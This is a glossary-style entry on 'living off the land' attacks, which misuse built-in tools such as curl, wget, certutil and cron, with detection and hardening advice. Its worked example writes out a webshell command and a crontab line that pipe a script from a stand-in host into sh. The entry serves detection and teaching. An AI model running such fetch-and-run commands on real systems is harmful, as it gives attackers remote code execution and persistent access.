Malware
Living off the land
Also called LotL.
Living off the land is using tools already on the machine, like `wget`, PowerShell, `curl`, or cron, to carry out an attack instead of dropping a custom program. The traffic and commands look like normal admin work.
How it is measured
Hunt for suspicious use of normal tools: `curl` piped to `sh`, `certutil` downloading files, PowerShell with encoded commands, or `crontab` entries that fetch scripts. Command-line logging and process trees show the pattern. The tool is clean; the arguments and parent process are the evidence.
Baseline normal use first. If `wget` never runs on a web server, a call to it from the PHP-FPM user is meaningful.
Worked example
A shared-hosting account is compromised through a file-upload bug. The attacker drops no binary. They run `wget -qO- http://203.0.113.5/a | sh` from a PHP webshell, add `* * * * * curl -s http://203.0.113.5/b | sh` to the user's crontab, and use `find` to hunt for config files.
The antivirus finds nothing, as no malicious file exists. The cron entry and the process tree of `php-fpm` spawning `sh` give it away.
How it differs
Living off the land relies on trusted tools; a webshell is often the way those tools get called from a web request. Remote code execution is the flaw that makes the first command possible. Unlike a dropper, living-off-the-land leaves no file to hash, so signature scanning has little to match.
Common errors
Searching only for new binaries. Blocking `wget` globally and breaking deployments. Ignoring cron and systemd timers. Not logging command lines. Assuming a clean file scan means a clean host.
In practice
Turn on process and command-line logging on your servers. Remove tools nothing needs, such as `wget` on a web-only host. Review crontabs and timers for every account and alert on any outbound download started by the web server user.